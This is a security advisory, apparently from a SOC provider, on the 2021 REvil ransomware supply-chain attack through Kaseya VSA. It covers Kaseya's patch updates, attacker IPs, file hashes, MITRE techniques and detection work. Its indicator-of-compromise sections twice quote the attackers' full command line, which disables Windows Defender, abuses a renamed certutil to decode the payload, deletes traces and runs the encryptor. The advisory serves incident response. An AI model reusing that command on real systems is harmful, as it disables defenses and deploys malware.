REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update v2
Posted Date: 07/12/2021
Published Date: 07/12/2021
Sector: Information Technology & Information Security
DATE(S) ISSUED: 07/02/2021
SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group
UPDATED OVERVIEW – 07/12/2021:
Kaseya has now successfully developed a patch for VSA servers on Sunday 07/11/2021. Below are the latest communications from Kaseya. These communications can also be found using the link in the references below.
You can install the patch with the "KInstall.exe" update utility, found online here if you do not find a local copy. Installing the patch does suggest a Windows Update if you have not recently installed the latest updates from Microsoft.
From our testing, installing the patch took approximately 10 minutes. After logging back in to the VSA service, you are prompted to change your password to meet the new policy requirements. With this patch installed, we believe the attack vector is no longer present.
Also note as previously communicated, spammers are using the news about the Kaseya Incident to send out fake email notifications that appear to be Kaseya updates. These are phishing emails that may contain malicious links and/or attachments.
Do not click on any links or download any attachments in emails claiming to be a Kaseya advisory. Moving forward, all new Kaseya email updates will not contain any links or attachments.
VSA Update – 07/12/2021 8:00 AM EST:
As posted in the previous update we released the patch to VSA On-Premises customers and began deploying to our VSA SaaS Infrastructure prior to the 4:00 PM target. The restoration of services is now complete, with 100% of our SaaS customers live as of 3:30 AM US EDT. Our support teams continue to work with VSA On-Premises customers who have requested assistance with the patch. We will continue to post updates as new information becomes available.
VSA Update – 07/11/2021 4:30 EST:
VSA SaaS and On-Premises Release Notes have now been published and are available at: https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041
The restoration of our VSA SaaS Infrastructure has begun. We will send email notifications as the individual instances come back online over the next several hours.
VSA SaaS Startup Runbook – https://helpdesk.kaseya.com/hc/en-gb/articles/4403709476369
VSA SaaS Hardening and Best Practice Guide – https://helpdesk.kaseya.com/hc/en-gb/articles/4403622421009-VSA-SaaS-Best-Practices
The VSA On-Premises patch is now available. You can run KINSTALL as you normally do as part of your patching process.
On Premises Startup Runbook (Updated July 11th – Updated Step 4) – https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993incident-response
VSA On-Premise Hardening and Practice Guide – https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417
Status updates from Kaseya can be found using the link as follows: https://www.kaseya.com/potential-attack-on-kaseya-vsa/?mkt_tok=OTM0LVhRQi01NjgAAAF-HMaXjyYKZpB4GMeVb1FvPQDEnE70x5s52h7OuAe962wcTuGkhfkUiJ-WlChAElUhRJKtHpfaFOyL4UyqIYOuNGXR5Qed0pzuVeLikGEHBvtI4LVb
“The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.
The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.
MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.
UPDATED THREAT INTELLIGENCE - 07/07/2021:
All on-premises VSA Servers should continue to remain offline until further instructions from Kaseya about when it is safe to restore operations. A patch will be required to be installed prior to restarting the VSA and a set of recommendations on how to increase your security posture.
On Monday, July 5, Kaseya announced they are developing a new patch for on-premise installations in order to assist customers in getting back to service. Kaseya also published a Compromise Detection Tool for customers to check if their on-premise installation had been actually compromised.
Since this outbreak, attackers have been scanning for Kaseya on-premise internet exposed servers using publicly available platforms such as Shodan.io. This time window allows attack groups besides REvil to obtain immediate access over the internet to customer-sensitive networks.
At this point, this appears to be the largest mass-scale ransomware incident to date. In an unexpected twist, the attackers are offering a universal decryption tool for all victims at a lump sum of $50 million (originally $70 million).
“We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say, "Kaseya has been hacked" without evidence.”
Kaseya's official recommendation is to: "IMMEDIATELY shutdown your local VSA server until you receive further notice from us.
We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. It’s critical that you do this immediately, because one of the first things the attacker does is shutoff administrative access to the VSA.”
SYSTEMS AFFECTED: Kaseya VSA Servers - Windows
Managed Service Providers (MSPs) or companies that provide remote IT services to other companies or access to remote systems are affected by this threat. Kaseya VSA is also used by regular businesses that are sized medium and large. Meaning this attack is not limited to MSPs only, but non-MSP entities as well.
UPDATED TECHNICAL SUMMARY - 07/07/2021:
On July 2 around 10:30 ET many Kaseya VSA servers were exploited and used to deploy ransomware. Here are the details of the server-side intrusion:
Attackers uploaded agent.crt and Screenshot.jpg to exploited VSA servers and this activity can be found in KUpload.log (which *may* be wiped by the attackers or encrypted by ransomware if a VSA agent was also installed on the VSA server).
A series of GET and POST requests using curl can be found within the KaseyaEdgeServices logs located in %ProgramData%\Kaseya\Log\KaseyaEdgeServices directory with a file name following this modified ISO8601 naming scheme KaseyaEdgeServices-YYYY-MM-DDTHH-MM-SSZ.log.
Attackers came from the following IP addresses using the user agent curl/7.69.1:18.223.199[.]234 (Amazon Web Services) discovered by Huntress161.35.239[.]148 (Digital Ocean) discovered by TrueSec35.226.94[.]113 (Google Cloud) discovered by Kaseya162.253.124[.]162 (Sapioterra) discovered by KaseyaWe've been in contact with the internal hunt teams at AWS and Digital Ocean and have passed information to the FBI Dallas office and relevant intelligence community agencies.
The VSA procedure used to deploy the encryptor was named "Kaseya VSA Agent Hot-fix”. An additional procedure named "Archive and Purge Logs" was run to clean up after themselves
The "Kaseya VSA Agent Hot-fix” procedure ran the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Endpoint Indicators of Compromise
Ransomware encryptors pushed via the Kaseya VSA agent were dropped in TempPath with the file name agent.crt and decoded to agent.exe. TempPath resolves to c:\kworking\agent.exe by default and is configurable within HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\
When agent.exe runs, the legitimate Windows Defender executable MsMpEng.exe and the encryptor payload mpsvc.dll are dropped into the hardcoded path "c:\Windows" to perform DLL sideloading.
The mpsvc.dll Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter which contains several registry values that store encryptor runtime keys/configurations artifacts.
• agent.crt - MD5: 939aae3cc456de8964cb182c75a5f8cc - Encoded malicious content
• agent.exe - MD5: 561cffbaba71a6e8cc1cdceda990ead4 - Decoded contents of agent.crt
• cert.exe - MD5: - Legitimate Windows certutil.exe utility
• mpsvc.dll - MD5: a47cf00aedf769d60d58bfe00c0b5421- REvil encryptor payload
Mitre TTPs Used in Kaseya Attack
• T1112 – Modify Registry
• T1012 – Query Registry
• T1082 – System Information Discovery
• T1120 – Peripheral Device Discovery
• T1491 – Defacement
• T1543.003 – Create or Modify System Process: Windows Service
• T1036 – Masquerading
• T1036.003 – Masquerading: Rename System Utilities
• T1202 – Indirect Command Execution
• T1486 – Data Encrypted for Impact
• T1106 – Native API
Here's validated indicators of compromise known at this time:
Ransomware encryptor is dropped to c:\kworking\agent.exe
The VSA procedure is named "Kaseya VSA Agent Hot-fix”
At least two tasks run the following:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y
C:\Windows\cert.exe & echo %RANDOM% >>
C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Other possible Indicators of Compromise (IOCs) identified:
Rich PE header hash
PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Windows Control Panel Item (generic) (88.3%)
Win64 Executable (generic) (4.7%)
Win16 NE executable (generic) (2.2%)
Win32 Executable (generic) (2%)
OS/2 Executable (generic) (0.9%)
890.88 KB (912264 bytes)
UPDATED ACTIONS TAKEN - 07/12/2021:
The CyFlare SOC is still actively monitoring for indicators of compromise related to the Kaseya supply chain attack. The updated actions taken are as follows:
• Worked with our security tool vendors such as Stellar Cyber-BDS, SentinelOne, Sophos, and Tenable to have the IOCs identified from the attack productized into new security detections.
o The detection for this activity “Emerging Threat Detection” is now active for BDS. If it’s triggered in your environment, then the SOC will immediately escalate.
o Confirmed there are AlienVault OTX Pulses for detecting this activity and triggering security detections if observed. Reference Link: https://otx.alienvault.com/pulse/60e02f9e498dfdf25caf7753
o SentinelOne has also confirmed that this threat is detected and mitigated by SentinelOne. Reference Link: https://www.sentinelone.com/blog/revils-grand-coup-abusing-kaseya-managed-services-software-for-massive-profits/
o Sophos has published a query to check for matching IOCs present on endpoints. Reference Link: https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/
o Tenable has released a local Windows detection for Kaseya agents as well as a remote detection plugin for Kaseya VSA to help you identify potentially vulnerable systems. When patches are available, we will also provide a version check plugin.
• We have been continuously searching for any suspicious artifacts observed within affected customer’s environments since this threat has emerged.
• As of today July 12th, using updated artifacts we can confirm we still have not observed any indicators of compromise among all of our clients related to this emerging threat.
• Please continue to ensure local VSA servers are shut off until further notice from Kaseya. SaaS offerings of VSA are all still shutdown by Kaseya (No SaaS VSA services online) until further notice and a patch is developed.
The CyFlare SOC is closely monitoring the situation as updates continue to arise from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down the entire SaaS architecture so they can examine everyone’s instances to be sure this is isolated to on-prem folks.
At this time, we do not believe any of our customers utilizing Kaseya are compromised at this time. This conclusion is the result of threat hunting searches performed looking for the indicators of compromise listed above into each affected customer’s environment/security solutions CyFlare manages.
For our managed endpoint or SentinelOne MDR customers, we have also implemented a global blacklist on one key IOC identified. We added the SHA1 Hash identified as the Kaseya VSA Ransomware Encryptor Hash to the blacklist.
As more details for this emerging threat arise through the Cyber community or through Kaseya notices, your SOC will continue to address. If there any further updates, or indication that one of our affected customers are compromise then we will engage you further immediately.
If you have any further questions, comments, or concerns regarding this threat then please do not hesitate in contacting your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.
Thank you for your cooperation